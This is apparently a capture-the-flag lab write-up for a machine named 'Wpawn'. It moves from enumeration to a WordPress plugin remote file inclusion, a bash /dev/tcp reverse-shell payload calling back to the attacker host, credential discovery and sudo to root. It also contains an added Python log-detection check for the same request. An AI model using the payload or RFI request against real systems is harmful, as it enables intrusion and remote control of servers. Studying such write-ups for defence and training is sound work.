🐧Wpawn
192.168.84.123
Enumeration
sudo nmap 192.168.84.123 -sV -A -p-

Port 22
Banner grab
nc 192.168.84.123 22

Port 80
Running dirbuster to enumerate the website.

Found an interesting plugin being used.

There are known vulnerabilities for this plugin. https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
Was able to get a reverse shell using the following.
Creating text file payload.txt and pulling it with Remote File Inclusion.
<pre>system("bash -c 'exec bash -i &>/dev/tcp/192.168.49.84/9966 <&1'")</pre>
http://192.168.84.123/wordpress/wp-admin/post.php?swp_debug=load_options&swp_url=http://192.168.49.84:8000/payload.txt
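
On the web server, the request above shows up as an access-log entry with swp_debug=load_options and a swp_url pointing at a host other than the site itself. The following detection check is an added example, not part of the original writeup: the log lines are constructed (Apache combined format assumed), and the function name and the site_hosts allow-list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format: ip - - [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); IPs reuse the lab addresses on this page.
SAMPLE_LOG = [
    '192.168.49.84 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress/wp-admin/post.php'
    '?swp_debug=load_options&swp_url=http://192.168.49.84:8000/payload.txt HTTP/1.1" 200 512',
    # Same request with the swp_url value percent-encoded
    '192.168.49.84 - - [01/Jan/2024:10:00:05 +0000] "GET /wordpress/wp-admin/post.php'
    '?swp_debug=load_options&swp_url=http%3A%2F%2F192.168.49.84%3A8000%2Fpayload.txt HTTP/1.1" 200 512',
    # Ordinary admin request: no swp_* parameters
    '192.168.84.10 - - [01/Jan/2024:10:01:00 +0000] "GET /wordpress/wp-admin/post.php'
    '?post=5&action=edit HTTP/1.1" 200 9034',
    # Options loaded from the site's own host: not flagged
    '192.168.84.10 - - [01/Jan/2024:10:02:00 +0000] "GET /wordpress/wp-admin/post.php'
    '?swp_debug=load_options&swp_url=http://192.168.84.123/wordpress/options.txt HTTP/1.1" 200 300',
]

def find_remote_option_loads(lines, site_hosts):
    """Return (client_ip, timestamp, swp_url) for every logged request that
    asks for options to be loaded from a host outside site_hosts."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        # parse_qs percent-decodes values, so encoded URLs are caught as well
        query = parse_qs(urlsplit(m["target"]).query)
        if "load_options" not in query.get("swp_debug", []):
            continue
        for url in query.get("swp_url", []):
            host = (urlsplit(url).hostname or "").lower()
            if host not in site_hosts:  # unparsable hosts are flagged too
                hits.append((m["ip"], m["ts"], url))
    return hits

if __name__ == "__main__":
    for ip, ts, url in find_remote_option_loads(SAMPLE_LOG, {"192.168.84.123"}):
        print(f"{ts} {ip} requested remote options from {url}")
```

Egress filtering that stops the web server from fetching arbitrary external URLs blocks the same behaviour at the network layer.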
Shell
Got a shell.

Found no interesting files. There is another user named takis. Dropped LinPEAS in /tmp.
Found credentials.

The password found works for takis' account; connected via SSH.

Running sudo -l

Root
Ran sudo su
